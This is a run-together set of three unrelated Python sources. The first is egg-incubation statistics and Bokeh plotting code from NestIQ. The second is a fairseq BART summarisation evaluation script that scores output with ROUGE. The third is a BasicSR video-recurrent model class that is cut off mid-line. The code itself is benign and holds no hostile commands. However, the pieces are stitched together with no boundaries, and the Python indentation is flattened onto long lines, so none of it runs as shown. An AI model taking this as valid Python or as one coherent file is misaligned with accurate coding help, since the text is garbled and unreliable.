gui.min_air_temper_BV.get(): header += "Min Air Temp (DN)," if gui.max_air_temper_BV.get(): header += "Max Air Temp (DN)," # ----------------------------------------------------------------------------------------------- day_rows = [] # Print individual day stats for i, block in enumerate(date_blocks): day_row = "" partial = " (Partial)" if block.partial_day else " (Full)" if gui.day_num_BV.get(): day_row += f"{i + 1}{partial}," if gui.date_BV.get(): day_row += f"{block.date}," if gui.off_count_BV.get(): day_row += f"{block.off_count}," if gui.off_dur_BV.get(): day_row += f"{block.mean_off_dur}," if gui.off_dur_sd_BV.get(): day_row += f"{block.off_dur_stdev}," if gui.off_dec_BV.get(): day_row += f"{block.mean_off_dec}," if gui.off_dec_sd_BV.get(): day_row += f"{block.off_dec_stdev}," if gui.mean_off_temper_BV.get(): day_row += f"{block.mean_off_temper}," if gui.off_time_sum_BV.get(): day_row += f"{block.off_time_sum}," if gui.on_count_BV.get(): day_row += f"{block.on_count}," if gui.on_dur_BV.get(): day_row += f"{block.mean_on_dur}," if gui.on_dur_sd_BV.get(): day_row += f"{block.on_dur_stdev}," if gui.on_inc_BV.get(): day_row += f"{block.mean_on_inc}," if gui.on_inc_sd_BV.get(): day_row += f"{block.on_inc_stdev}," if gui.mean_on_temper_BV.get(): day_row += f"{block.mean_on_temper}," if gui.on_time_sum_BV.get(): day_row += f"{block.on_time_sum}," if gui.time_above_temper_BV.get(): day_row += f"{block.time_above_temper}," if gui.time_below_temper_BV.get(): day_row += f"{block.time_below_temper}," if gui.bouts_dropped_BV.get(): day_row += f"{block.bouts_dropped}," if gui.mean_temper_d_BV.get(): day_row += f"{block.mean_egg_temper_day}," if gui.mean_temper_d_sd_BV.get(): day_row += f"{block.egg_temper_stdev_day}," if gui.median_temper_d_BV.get(): day_row += f"{block.median_egg_temper_day}," if gui.min_temper_d_BV.get(): day_row += f"{block.min_egg_temper_day}," if gui.max_temper_d_BV.get(): day_row += f"{block.max_egg_temper_day}," if gui.mean_temper_n_BV.get(): day_row += f"{block.mean_egg_temper_night}," if gui.mean_temper_n_sd_BV.get(): day_row += f"{block.egg_temper_stdev_night}," if gui.median_temper_n_BV.get(): day_row += f"{block.median_egg_temper_night}," if gui.min_temper_n_BV.get(): day_row += 
f"{block.min_egg_temper_night}," if gui.max_temper_n_BV.get(): day_row += f"{block.max_egg_temper_night}," if gui.mean_temper_dn_BV.get(): day_row += f"{block.mean_egg_temper}," if gui.mean_temper_dn_sd_BV.get(): day_row += f"{block.egg_temper_stdev}," if gui.median_temper_dn_BV.get(): day_row += f"{block.median_temper}," if gui.min_temper_dn_BV.get(): day_row += f"{block.min_egg_temper}," if gui.max_temper_dn_BV.get(): day_row += f"{block.max_egg_temper}," if gui.air_valid: if gui.mean_air_temper_BV.get(): day_row += f"{block.mean_air_temper}," if gui.mean_air_temper_sd_BV.get(): day_row += f"{block.air_temper_stdev}," if gui.min_air_temper_BV.get(): day_row += f"{block.min_air_temper}," if gui.max_air_temper_BV.get(): day_row += f"{block.max_air_temper}," day_rows.append(day_row) gui.multi_in_full_day_count += len(date_blocks) # ----------------------------------------------------------------------------------------------- # Output stats summary for entire input file summary_row = "" if gui.day_num_BV.get(): summary_row += f"--," if gui.date_BV.get(): summary_row += f"ALL DATA," if gui.off_count_BV.get(): summary_row += f"{master_block.off_count}," if gui.off_dur_BV.get(): summary_row += f"{master_block.mean_off_dur}," if gui.off_dur_sd_BV.get(): summary_row += f"{master_block.off_dur_stdev}," if gui.off_dec_BV.get(): summary_row += f"{master_block.mean_off_dec}," if gui.off_dec_sd_BV.get(): summary_row += f"{master_block.off_dec_stdev}," if gui.mean_off_temper_BV.get(): summary_row += f"{master_block.mean_off_temper}," if gui.off_time_sum_BV.get(): summary_row += f"{master_block.off_time_sum}," if gui.on_count_BV.get(): summary_row += f"{master_block.on_count}," if gui.on_dur_BV.get(): summary_row += f"{master_block.mean_on_dur}," if gui.on_dur_sd_BV.get(): summary_row += f"{master_block.on_dur_stdev}," if gui.on_inc_BV.get(): summary_row += f"{master_block.mean_on_inc}," if gui.on_inc_sd_BV.get(): summary_row += f"{master_block.on_inc_stdev}," if gui.mean_on_temper_BV.get(): summary_row += f"{master_block.mean_on_temper}," if gui.on_time_sum_BV.get(): summary_row += f"{master_block.on_time_sum}," if gui.time_above_temper_BV.get(): summary_row += f"{master_block.time_above_temper}," if gui.time_below_temper_BV.get(): summary_row += f"{master_block.time_below_temper}," if gui.bouts_dropped_BV.get(): summary_row += f"{master_block.bouts_dropped}," if gui.mean_temper_d_BV.get(): summary_row += f"{master_block.mean_egg_temper_day}," if gui.mean_temper_d_sd_BV.get(): summary_row += f"{master_block.egg_temper_stdev_day}," if gui.median_temper_d_BV.get(): summary_row += f"{master_block.median_egg_temper_day}," if gui.min_temper_d_BV.get(): summary_row += f"{master_block.min_egg_temper_day}," if gui.max_temper_d_BV.get(): summary_row += f"{master_block.max_egg_temper_day}," if gui.mean_temper_n_BV.get(): summary_row += f"{master_block.mean_egg_temper_night}," if gui.mean_temper_n_sd_BV.get(): summary_row += f"{master_block.egg_temper_stdev_night}," if gui.median_temper_n_BV.get(): summary_row += f"{master_block.median_egg_temper_night}," if gui.min_temper_n_BV.get(): summary_row += f"{master_block.min_egg_temper_night}," if gui.max_temper_n_BV.get(): summary_row += f"{master_block.max_egg_temper_night}," if gui.mean_temper_dn_BV.get(): summary_row += f"{master_block.mean_egg_temper}," if gui.mean_temper_dn_sd_BV.get(): summary_row += f"{master_block.egg_temper_stdev}," if gui.median_temper_dn_BV.get(): summary_row += f"{master_block.median_temper}," if gui.min_temper_dn_BV.get(): summary_row += 
f"{master_block.min_egg_temper}," if gui.max_temper_dn_BV.get(): summary_row += f"{master_block.max_egg_temper}," if gui.air_valid: if gui.mean_air_temper_BV.get(): summary_row += f"{master_block.mean_air_temper}," if gui.mean_air_temper_sd_BV.get(): summary_row += f"{master_block.air_temper_stdev}," if gui.min_air_temper_BV.get(): summary_row += f"{master_block.min_air_temper}," if gui.max_air_temper_BV.get(): summary_row += f"{master_block.max_air_temper}," summary_row += "\n\n" # Determine what files to write day statistics to out_paths = [] if gui.get_stats_BV.get(): out_paths.append(Path(gui.stats_file_E.get())) if gui.multi_in_stats_BV.get(): out_paths.append(Path(gui.multi_in_stats_file_E.get())) # Write day statistics for path in out_paths: with open(path, "a") as out_file: print(header, end="\n", file=out_file) print("\n".join(day_rows), end="\n", file=out_file) print(summary_row, end="\n", file=out_file) if not gui.get_stats_BV.get(): return # ----------------------------------------------------------------------------------------------- # Report information on individual bouts indi_header = "Individual Bout Stats\n" indi_header += ( "Date,Bout Type,Start Time,End Time,Start Data Point,End Data Point,Duration (min),Egg Temp Change,Start Egg Temp,End Egg Temp,Mean Egg Temp, Egg Temp StDev," ) if gui.air_valid: indi_header += "Start Air Temp, End Air Temp, Mean Air Temp, Air Temp StDev" bouts = master_block.bouts bout_rows = [] cur_date = "" for bout in bouts: row = "" # Print date if it is the first row corresponding to this date this_date = gui.master_df.loc[bout.first, "date_time"].strftime(r"%m/%d/%Y") row += "," if this_date == cur_date else f"{this_date}," cur_date = this_date row += f"{bout.bout_type}," row += ( f"{gui.master_df.loc[bout.first, 'date_time'].strftime(r'%H:%M')}," + f"{gui.master_df.loc[bout.last, 'date_time'].strftime(r'%H:%M')}," + f"{gui.master_df.loc[bout.first, 'data_point']}," + f"{gui.master_df.loc[bout.last, 'data_point']}," + f"{bout.dur}," + f"{bout.temper_change}," + f"{gui.master_df.loc[bout.first, 'egg_temper']}," + f"{gui.master_df.loc[bout.last, 'egg_temper']}," + f"{bout.mean_egg_temper}," + f"{bout.egg_temper_stdev}," ) if gui.air_valid: row += ( f"{gui.master_df.loc[bout.first, 'air_temper']}," + f"{gui.master_df.loc[bout.last, 'air_temper']}," + f"{bout.mean_air_temper}," + f"{bout.air_temper_stdev}" ) bout_rows.append(row) with open(Path(gui.stats_file_E.get()), "a") as out_file: print(indi_header, end="\n", file=out_file) print("\n".join(bout_rows), file=out_file) def generate_plot(gui, days_list, edit_mode=False, out_path=None): """ Uses the Bokeh module to generate an interactive plot for the current input file. Args: gui (GUIClass): days_list (list): used to place vertical day delimiting line edit_mode (bool): generates a modified plot that allows for vertex manipulation """ def get_plot_dims(): """ Determine plot dimientions based on either user provided values or monitor dimension detection. 
""" if not gui.manual_plot_dims.get(): try: mon_dims = (gui.root.winfo_screenwidth(), gui.root.winfo_screenheight()) mon_x = mon_dims[0] mon_y = mon_dims[1] plot_width = int(mon_x) - 100 plot_height = int(mon_y) - 200 except: print("Defaulting to manual plot dimensions") plot_width = int(gui.plot_dim_x_E.get()) plot_height = int(gui.plot_dim_y_E.get()) else: plot_width = int(gui.plot_dim_x_E.get()) plot_height = int(gui.plot_dim_y_E.get()) return plot_width, plot_height def get_plot_axes(): """ Determine proper constrains of y axis """ y_min = float("inf") y_max = float("-inf") if gui.plot_egg_BV.get(): y_min = min(y_min, df["egg_temper"].min()) y_max = max(y_max, df["egg_temper"].max()) if gui.plot_air_BV.get() and gui.air_valid: y_min = min(y_min, df["air_temper"].min()) y_max = max(y_max, df["air_temper"].max()) if gui.plot_adj_BV.get(): y_min = min(y_min, df["smoothed_adj_temper"].min()) y_max = max(y_max, df["smoothed_adj_temper"].max()) y_min -= 2 y_max += 2 return y_min, y_max def generate_table(): """ Generate table with vertex information """ table_title = "Egg Temperature" verts = get_verts_from_master_df(df) x_list, y_list = [], [] # Add vertices to table (allow egg_tempers or adj_tempers, not both) if gui.plot_egg_BV.get(): x_list += [df.loc[vert.index, "data_point"] for vert in verts] y_list += [df.loc[vert.index, "egg_temper"] for vert in verts] elif gui.plot_adj_BV.get(): table_title = "Adjusted Temperature" x_list += [df.loc[vert.index, "data_point"] for vert in verts] y_list += [df.loc[vert.index, "smoothed_adj_temper"] for vert in verts] data = {"x": x_list, "y": y_list} src = ColumnDataSource(data) columns = [TableColumn(field="x", title="Transition Data Point"), TableColumn(field="y", title=table_title)] # FLAG shoud make height dynamic data_table = DataTable(source=src, columns=columns, width=500, height=100000) return data_table def append_input_info(path): # Get number of seconds between each data point first = df["date_time"].iloc[0] last = df["date_time"].iloc[-1] delta_sec = (last - first).total_seconds() interval = round(delta_sec / len(df)) # Create dictionary summarizing critical input file information input_dict = { "first_dp": int(df["data_point"].iloc[0]), "first_dt": df["date_time"].iloc[0].strftime(r"%m/%d/%Y %H:%M:%S"), "dt_interval": interval, "egg_temper": df["egg_temper"].tolist(), "air_temper": df["air_temper"].tolist() } # Append input file information to the HTML file with open(path, "a") as file: file.write("\n\n<!--NestIQ input data\n") file.write(json.dumps(input_dict)) file.write("\n-->\n") df = gui.master_df master_array = df_to_array(df) # Clears previous plots from memory reset_output() # Set output file out_path = out_path if out_path is not None else Path(gui.plot_file_E.get()) output_file(out_path) plot_width, plot_height = get_plot_dims() TOOLTIPS = [("Data Point", "$x{int}"), ("Temperature", "$y")] hover = HoverTool(tooltips=TOOLTIPS) # Set plot title plot_name = Path(gui.input_file_E.get()).stem if gui.plot_title_E.get() != "": plot_name = gui.plot_title_E.get() # Set plot axes y_min, y_max = get_plot_axes() dp_col_num = df.columns.get_loc("data_point") # Create core plot plot = figure( tools=[hover, "box_select, box_zoom, wheel_zoom, pan, reset, save"], x_range=[df.iloc[0, dp_col_num], df.iloc[-1, dp_col_num]], y_range=[y_min, y_max], title=plot_name, x_axis_label="Data Point", y_axis_label="Temperature (C)", plot_width=plot_width, plot_height=plot_height, ) # Add vertical lines delimiting days if gui.show_day_markers_BV.get(): for day 
in days_list: vertical_line = Span( location=int(df.loc[day.first, "data_point"]), dimension="height", line_color=gui.day_marker_color.get(), line_width=float(gui.day_marker_width_E.get()), line_alpha=0.4, ) plot.renderers.extend([vertical_line]) plot.grid.visible = True if gui.show_grid_BV.get() else False # Define data point colors if edit_mode: # Set static color color_ = "gray" alpha_ = 1 else: # Set color based on bout state bout_state_col_num = 2 color_key = {0: gui.off_point_color.get(), 1: gui.on_point_color.get(), 2: "lightgray"} color_ = np.vectorize(color_key.get)(master_array[:, bout_state_col_num]) alpha_key = {0: 1, 1: 1, 2: 1} alpha_ = np.vectorize(alpha_key.get)(master_array[:, bout_state_col_num]) radius = int(gui.smoothing_radius_E.get()) # Get array of air temperatures and smooth if requested if gui.air_valid and gui.plot_air_BV.get(): air_array = df["air_temper"] if gui.smooth_status_IV.get(): air_array = smooth_series(radius, air_array) # Plot air temperatures plot.line( df["data_point"], air_array, line_width=float(gui.air_line_width_E.get()), color=gui.air_line_color.get(), line_alpha=1, legend="Air temperature", ) # Get array of egg temperatures and smooth if requested if gui.plot_egg_BV.get(): egg_array = df["egg_temper"] if gui.smooth_status_IV.get(): egg_array = smooth_series(radius, egg_array) # Update legend if not edit_mode: legend_ = "On-bout (egg)" if gui.plot_adj_BV.get() else "On-bout" plot.circle(df.loc[0, "data_point"], egg_array[0], size=float(gui.on_point_size_E.get()), color=gui.on_point_color.get(), legend=legend_) legend_ = "Off-bout (egg)" if gui.plot_adj_BV.get() else "Off-bout" plot.circle(df.loc[0, "data_point"], egg_array[0], size=float(gui.on_point_size_E.get()), color=gui.off_point_color.get(), legend=legend_) # Plot egg temperatures if float(gui.bout_line_width_E.get()) > 0: plot.line(df["data_point"], egg_array, line_width=float(gui.bout_line_width_E.get()), color=gui.bout_line_color.get()) plot.circle(df["data_point"], egg_array, size=float(gui.on_point_size_E.get()), color=color_, alpha=alpha_) # Get array of adjusted (egg - air) temperatures and smooth if requested if gui.plot_adj_BV.get(): adj_array = df["smoothed_adj_temper"] # Plot line if float(gui.bout_line_width_E.get()) > 0: plot.line(df["data_point"], adj_array, line_width=float(gui.bout_line_width_E.get()), color=gui.bout_line_color.get()) # Plot adjusted temperatures as triangles if egg temperatures are also being plotted plot_shape = plot.triangle if gui.plot_egg_BV.get() else plot.circle # Add legend values (dummy glyphs at the first data point, mirroring the egg branch above) if edit_mode: plot.circle(df.loc[0, "data_point"], adj_array[0], size=float(gui.on_point_size_E.get()), color="gray", legend="Temperature reading") else: plot_shape( df.loc[0, "data_point"], adj_array[0], size=float(gui.on_point_size_E.get()), color=gui.on_point_color.get(), legend="On-bout (egg - air)", ) plot_shape( df.loc[0, "data_point"], adj_array[0], size=float(gui.on_point_size_E.get()), color=gui.off_point_color.get(), legend="Off-bout (egg - air)", ) # Add data points plot_shape(df["data_point"], adj_array, size=float(gui.on_point_size_E.get()), color=color_, alpha=alpha_) data_table = generate_table() if edit_mode: # Plot vertices as large circles in select mode renderer = plot.circle("x", "y", size=float(gui.on_point_size_E.get()), color="red", fill_alpha=0.8, legend="Incubation State Change", source=data_table.source) draw_tool = PointDrawTool(renderers=[renderer], empty_value=1) plot.add_tools(draw_tool) plot.toolbar.active_drag = draw_tool # Get formatting settings
from GUI plot.title.text_font_size = gui.title_font_size_E.get() + "pt" plot.axis.axis_label_text_font_size = gui.axis_title_font_size_E.get() + "pt" plot.axis.major_label_text_font_size = gui.axis_label_font_size_E.get() + "pt" plot.axis.major_tick_line_width = int(gui.axis_tick_size_E.get()) plot.axis.minor_tick_line_width = int(gui.axis_tick_size_E.get()) plot.axis.major_tick_out = int(gui.axis_tick_size_E.get()) plot.axis.minor_tick_out = int(gui.axis_tick_size_E.get()) plot.legend.label_text_font_size = gui.legend_font_size_E.get() + "pt" plot.legend.click_policy = "hide" plot.legend.location = gui.legend_loc.get() plot.background_fill_color = None plot.border_fill_color = None show(column(plot, widgetbox(data_table))) append_input_info(out_path) def get_verts_from_master_df(master_df): """ Extracts vertex objects based on state transitions in master_df. Args: master_df (pd.DataFrame) """ if "bout_state" not in master_df.columns: return [] # Convert bout_states to integers temp_df = master_df.copy() int_states = temp_df.loc[:, "bout_state"].replace(["off", "on", "None"], [0, 1, 2]) # Create Boolean Series that stores if the state has changed state_changed = int_states.diff().astype(bool) state_changed.iloc[0] = False # Extract indices of rows where the state changes vert_indices = master_df[state_changed].index.tolist() vertices = [] for index in vert_indices: row = master_df.loc[index] vertices.append(niq_classes.Vertex(index, row["egg_temper"], row["bout_state"])) # Add vertices at beginning and end of data set last = len(master_df) - 1 vertices.append(niq_classes.Vertex(0, master_df.loc[0, "egg_temper"], master_df.loc[0, "bout_state"])) vertices.append(niq_classes.Vertex(last, master_df.loc[last, "egg_temper"], master_df.loc[last, "bout_state"])) vertices.sort(key=lambda x: x.index) return vertices def replace_entry(entry, new_value): entry.delete(0, "end") entry.insert(0, new_value) def filter_by_dur(gui): """ Purges the master df of state clusters failing to meet a given duration threshold. Args: gui (GUI) """ dur_thresh = int(gui.dur_thresh_E.get()) df = gui.master_df bouts_dropped_locs = set() # Iterate over a copy so bouts can be removed from the original list safely for bout in list(gui.master_block.bouts): dur = bout.last - bout.first # If duration threshold not met if dur < dur_thresh: # Set bout_state for corresponding rows to that of adjacent row new_state = "on" if bout.bout_type == "off" else "off" df.loc[bout.first:bout.last, "bout_state"] = new_state bouts_dropped_locs.add(bout.middle) # Delete bout gui.master_block.bouts.remove(bout) return df, bouts_dropped_locs def set_unique_path(entry, path, ext): """ Increments an identification number until a unique file name is found then fills entry box with unique path. Args: entry (tk.Entry): entry box being updated path (pathlib.Path): path to check for uniqueness ext (str): file extension """ counter = 0 ori_stem = path.stem file_path = Path(path).with_suffix(ext) # Adds trailing number until unique path is found while file_path.exists(): counter += 1 file_path = (file_path.parent / (ori_stem + "_" + str(counter).zfill(3))).with_suffix(ext) replace_entry(entry, file_path) def remove_curly(*entries, string=False): """ Removes curly braces from entry box contents. These are often added for paths containing spaces. Args: entries (tk.Entry) """ if string: return entries[0].lstrip("{").rstrip("}") for entry in entries: replace_entry(entry, entry.get().lstrip("{").rstrip("}")) def df_to_array(df): """ Convert master DataFrame to numpy array.
Columns: 0 - data point 1 - delta temper (emission), change in smoothed_egg_temper or smoothed_adj_temper depending on user setting 2 - bout state """ # If array is passed, just return if isinstance(df, np.ndarray): return df # Grab appropriate columns if "bout_state" in df.columns: mod_df = df.loc[:, ["data_point", "delta_temper", "bout_state"]].copy() # Convert bout states to integers mod_df.loc[:, "bout_state"].replace(["off", "on", "None"], [0, 1, 2], inplace=True) else: mod_df = df[["data_point", "delta_temper"]] return mod_df.to_numpy() def get_bouts_from_verts(gui, verts): """ Extracts bout objects based on vertex locations. Args: gui (GUIClass) """ bouts = [] # Return if insufficient number of vertices supplied if verts is None or len(verts) < 2: return bouts # Create bout objects cur_vert = verts[0] for next_vert in verts[1:]: # Skip if cur_vert is start of nighttime period if cur_vert.vert_type != "None" and next_vert.index > cur_vert.index: bouts.append(niq_classes.Bout(gui, cur_vert.index, next_vert.index - 1, cur_vert.vert_type)) cur_vert = next_vert bouts.sort(key=lambda x: x.first) return bouts def is_number(string): try: float(string) except ValueError: return False return True
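# --- Hedged illustration (not part of the original module) ---
# Minimal, self-contained sketch of the state-transition trick used in
# get_verts_from_master_df above: map the categorical bout states to integers,
# then let Series.diff() flag the rows where the state changes. The toy
# "bout_state" values below are invented for demonstration only.
def _demo_state_transitions():
    import pandas as pd
    demo = pd.DataFrame({"bout_state": ["off", "off", "on", "on", "off", "off"]})
    int_states = demo["bout_state"].replace(["off", "on", "None"], [0, 1, 2])
    state_changed = int_states.diff().astype(bool)
    state_changed.iloc[0] = False  # diff() yields NaN (truthy as bool) for row 0
    return demo[state_changed].index.tolist()  # -> [2, 4]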
import torch from fairseq.models.bart import BARTModel import argparse from pprint import pprint from tqdm import tqdm import os from os.path import join import shutil import logging import numpy as np import json import random import string import files2rouge import time def test_rouge(cand, ref, outpath=None, tmp_dir='/tmp/'): def random_string(stringLength=8): """Generate a random string of fixed length """ letters = string.ascii_lowercase return ''.join(random.sample(letters, stringLength)) tmp_path = join(tmp_dir, 'tmp'+random_string()) os.makedirs(tmp_path) hyp_path = join(tmp_path, 'hyp.txt') ref_path = join(tmp_path, 'ref.txt') candidates = [line.strip().lower() for line in open(cand, encoding='utf-8')] references = [json.loads(line.strip())['target'] for line in open(ref, encoding='utf-8')] paper_ids = [json.loads(line.strip())['paper_id'] for line in open(ref, encoding='utf-8')] assert len(candidates) == len(references), f'{tmp_dir}: len cand {len(candidates)} len ref {len(references)}' all_scores = [] save_scores = [] # For each prediction for cand_idx, cand in enumerate(candidates): curr_targets = references[cand_idx] curr_scores = [] hyp = open(join(tmp_path, 'hyp.txt'), 'w') hyp.write(cand) hyp.close() # For each target for tgt in curr_targets: tgt = tgt.lower().strip('\n') ref = open(join(tmp_path, 'ref.txt'), 'w') ref.write(tgt) ref.close() try: _r = files2rouge.run(ref_path, hyp_path, to_json=True) except Exception as e: print(e) exit(1) curr_scores.append(_r) # Take the max of curr scores r1 = [r['rouge-1']['f'] for r in curr_scores] max_idx = r1.index(max(r1)) save_scores.append({ 'paper_id': paper_ids[cand_idx], 'all_scores': curr_scores, 'max_idx': max_idx, 'prediction': cand, 'target': curr_targets }) all_scores.append(curr_scores[max_idx]) # Average across all scores avg_scores = {"rouge-1": { "f": [], "p": [], "r":[] }, "rouge-2": { "f": [], "p": [], "r": [] }, "rouge-l": { "f": [], "p": [], "r": [] } } # Append all scores to an array, then average over the array for score in all_scores: for r_type in score.keys(): for m_type in score[r_type].keys(): x = score[r_type][m_type] avg_scores[r_type][m_type].append(x) for r_type in avg_scores.keys(): for m_type in avg_scores[r_type].keys(): x = avg_scores[r_type][m_type] avg_scores[r_type][m_type] = np.mean(x) if outpath: with open(outpath, 'w') as fout: for s in save_scores: fout.write(json.dumps(s) + '\n') shutil.rmtree(tmp_path) return avg_scores def evaluate(bart, bsz, count, datadir, outdir, decoder_params, test_fname='test.hypo', multitarget=False, quick=False): if torch.cuda.is_available(): bart.cuda() bart.half() bart.eval() source_fname = os.path.join(datadir, 'test.source') pred_fname = os.path.join(outdir, test_fname) with open(source_fname, encoding="utf-8") as source, open(pred_fname, 'w', encoding="utf-8") as fout: sline = source.readline().strip() # sline = f'{sline} {decoder_params["ctrl"]} .'
slines = [sline] for sline in tqdm(source): if count % bsz == 0: with torch.no_grad(): hypotheses_batch = bart.sample(slines, beam=decoder_params['beam'], lenpen=decoder_params['lenpen'], max_len_b=decoder_params['max_len_b'], min_len=decoder_params['min_len'], no_repeat_ngram_size=decoder_params['no_repeat_ngram_size']) for hypothesis in hypotheses_batch: fout.write(hypothesis + '\n') fout.flush() slines = [] slines.append(sline.strip()) count += 1 if slines != []: hypotheses_batch = bart.sample(slines, beam=decoder_params['beam'], lenpen=decoder_params['lenpen'], max_len_b=decoder_params['max_len_b'], min_len=decoder_params['min_len'], no_repeat_ngram_size=decoder_params['no_repeat_ngram_size']) for hypothesis in hypotheses_batch: fout.write(hypothesis.replace('\n', ' ') + '\n') fout.flush() ref_fname = 'test.jsonl' ref_fname = os.path.join(datadir, ref_fname) r = test_rouge(pred_fname, ref_fname, outpath=os.path.join(outdir, test_fname + '.rouge')) return r def maybe_percentages(r, percentages): if percentages: for r_type in ['rouge-1', 'rouge-2', 'rouge-l']: for m_type in ['f', 'p', 'r']: x = r[r_type][m_type] r[r_type][m_type] = x * 100 return r if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('datadir') parser.add_argument('checkpoint_dir') parser.add_argument('--checkpoint_file', default='checkpoint_best.pt') parser.add_argument('--outdir', default='') parser.add_argument('--percentages', action='store_true', default=False, help='flag if you want to print as percentages') # Decoder params # parser.add_argument('--ctrl', default='<|TLDR|>') parser.add_argument('--count', default=1, type=int) parser.add_argument('--batch_size', '--bsz', default=32, type=int, dest='bsz') parser.add_argument('--test_fname', default='test.hypo') parser.add_argument('--beam', default=6, type=int) parser.add_argument('--lenpen', default=1.0, type=float) parser.add_argument('--max_len_b', default=30, type=int) parser.add_argument('--min_len', default=5, type=int) parser.add_argument('--no_repeat_ngram_size', default=3, type=int) args = parser.parse_args() start = time.time() #### Path checks (exit non-zero so failures are visible to the shell) if not os.path.exists(args.datadir): print(f'{args.datadir} does not exist') exit(1) if not os.path.exists(join(args.datadir, 'test.source')): print(f'{join(args.datadir, "test.source")} does not exist') exit(1) if (not os.path.exists(join(args.checkpoint_dir, args.checkpoint_file))): print(f'{join(args.checkpoint_dir, args.checkpoint_file)} does not exist') exit(1) if not args.outdir: args.outdir = args.checkpoint_dir os.makedirs(args.outdir, exist_ok=True) if args.datadir.endswith('/'): args.datadir = args.datadir[:-1] bart = BARTModel.from_pretrained( args.checkpoint_dir, checkpoint_file=args.checkpoint_file, data_name_or_path=args.datadir + '-bin', task='translation' ) decoder_params = { # 'ctrl': args.ctrl, 'beam': args.beam, 'lenpen': args.lenpen, 'max_len_b': args.max_len_b, 'min_len': args.min_len, 'no_repeat_ngram_size': args.no_repeat_ngram_size } r = evaluate(bart, args.bsz, args.count, args.datadir, args.outdir, decoder_params, test_fname=args.test_fname, ) r['beam'] = args.beam r['lenpen'] = args.lenpen pprint(maybe_percentages(r, args.percentages)) with open(join(args.outdir, args.test_fname + '.score'), 'w') as fout: fout.write(json.dumps(r, indent=4)) end = time.time() print(f'Time to run script: {(end-start)} sec')
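# --- Hedged sketch (illustration only; fake_sample is a hypothetical stand-in for bart.sample) ---
# The read/flush loop in evaluate() above is easy to get wrong: the first source
# line is read before the loop, `count` starts at 1, and a final partial batch
# must be flushed after the loop so no line is dropped.
def _demo_batching(lines, bsz=3, count=1):
    def fake_sample(batch):  # placeholder for the real model call
        return [f'hyp({s})' for s in batch]
    out = []
    it = iter(lines)
    slines = [next(it).strip()]
    for sline in it:
        if count % bsz == 0:
            out.extend(fake_sample(slines))
            slines = []
        slines.append(sline.strip())
        count += 1
    if slines:
        out.extend(fake_sample(slines))
    return out  # _demo_batching([f'l{i}' for i in range(7)]) returns 7 hypotheses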
import torch from collections import Counter from os import path as osp from torch import distributed as dist from tqdm import tqdm from basicsr.metrics import calculate_metric from basicsr.utils import get_root_logger, imwrite, tensor2img from basicsr.utils.dist_util import get_dist_info from basicsr.utils.registry import MODEL_REGISTRY from .video_base_model import VideoBaseModel @MODEL_REGISTRY.register() class VideoRecurrentModel(VideoBaseModel): def __init__(self, opt): super(VideoRecurrentModel, self).__init__(opt) if self.is_train: self.fix_flow_iter = opt['train'].get('fix_flow') def setup_optimizers(self): train_opt = self.opt['train'] flow_lr_mul = train_opt.get('flow_lr_mul', 1) logger = get_root_logger() logger.info(f'Multiply the learning rate of the flow network by {flow_lr_mul}.') if flow_lr_mul == 1: optim_params = self.net_g.parameters() else: # separate flow params and normal params for different lr normal_params = [] flow_params = [] for name, param in self.net_g.named_parameters(): if 'spynet' in name: flow_params.append(param) else: normal_params.append(param) optim_params = [ { # add normal params first 'params': normal_params, 'lr': train_opt['optim_g']['lr'] }, { 'params': flow_params, 'lr': train_opt['optim_g']['lr'] * flow_lr_mul }, ] optim_type = train_opt['optim_g'].pop('type') self.optimizer_g = self.get_optimizer(optim_type, optim_params, **train_opt['optim_g']) self.optimizers.append(self.optimizer_g) def optimize_parameters(self, current_iter): if self.fix_flow_iter: logger = get_root_logger() if current_iter == 1: logger.info(f'Fix flow network and feature extractor for {self.fix_flow_iter} iters.') for name, param in self.net_g.named_parameters(): if 'spynet' in name or 'edvr' in name: param.requires_grad_(False) elif current_iter == self.fix_flow_iter: logger.warning('Train all the parameters.') self.net_g.requires_grad_(True) super(VideoRecurrentModel, self).optimize_parameters(current_iter) def dist_validation(self, dataloader, current_iter, tb_logger, save_img): dataset = dataloader.dataset dataset_name = dataset.opt['name'] with_metrics = self.opt['val']['metrics'] is not None # initialize self.metric_results # It is a dict: { # 'folder1': tensor (num_frame x len(metrics)), # 'folder2': tensor (num_frame x len(metrics)) # } if with_metrics: if not hasattr(self, 'metric_results'): # only execute in the first run self.metric_results = {} num_frame_each_folder = Counter(dataset.data_info['folder']) for folder, num_frame in num_frame_each_folder.items(): self.metric_results[folder] = torch.zeros( num_frame, len(self.opt['val']['metrics']), dtype=torch.float32, device='cuda') # initialize the best metric results self._initialize_best_metric_results(dataset_name) # zero self.metric_results rank, world_size = get_dist_info() if with_metrics: for _, tensor in self.metric_results.items(): tensor.zero_() metric_data = dict() num_folders = len(dataset) num_pad = (world_size - (num_folders % world_size)) % world_size if rank == 0: pbar = tqdm(total=len(dataset), unit='folder') # Will evaluate (num_folders + num_pad) times, but only the first num_folders results will be recorded.
# (to avoid deadlock on ranks that have no folder left) for i in range(rank, num_folders + num_pad, world_size): idx = min(i, num_folders - 1) val_data = dataset[idx] folder = val_data['folder'] # compute outputs val_data['lq'].unsqueeze_(0) val_data['gt'].unsqueeze_(0) self.feed_data(val_data) val_data['lq'].squeeze_(0) val_data['gt'].squeeze_(0) self.test() visuals = self.get_current_visuals() # tentative workaround for running out of GPU memory del self.lq del self.output if 'gt' in visuals: del self.gt torch.cuda.empty_cache() if self.center_frame_only: visuals['result'] = visuals['result'].unsqueeze(1) if 'gt' in visuals: visuals['gt'] = visuals['gt'].unsqueeze(1) # evaluate if i < num_folders: for idx in range(visuals['result'].size(1)): result = visuals['result'][0, idx, :, :, :] result_img = tensor2img([result]) # uint8, bgr metric_data['img'] = result_img if 'gt' in visuals: gt = visuals['gt'][0, idx, :, :, :] gt_img = tensor2img([gt]) # uint8, bgr metric_data['img2'] = gt_img if save_img: if self.opt['is_train']: raise NotImplementedError('saving image is not supported during training.') else: if self.center_frame_only: # vimeo-90k clip_ = val_data['lq_path'].split('/')[-3] seq_ = val_data['lq_path'].split('/')[-2] name_ = f'{clip_}_{seq_}' img_path = osp.join(self.opt['path']['visualization'], dataset_name, folder, f"{name_}_{self.opt['name']}.png") else: # others img_path = osp.join(self.opt['path']['visualization'], dataset_name, folder, f"{idx:08d}_{self.opt['name']}.png") # image name only for REDS dataset imwrite(result_img, img_path) # calculate metrics if with_metrics: for metric_idx, opt_ in enumerate(self.opt['val']['metrics'].values()): result = calculate_metric(metric_data, opt_) self.metric_results[folder][idx, metric_idx] += result # progress bar if rank == 0: for _ 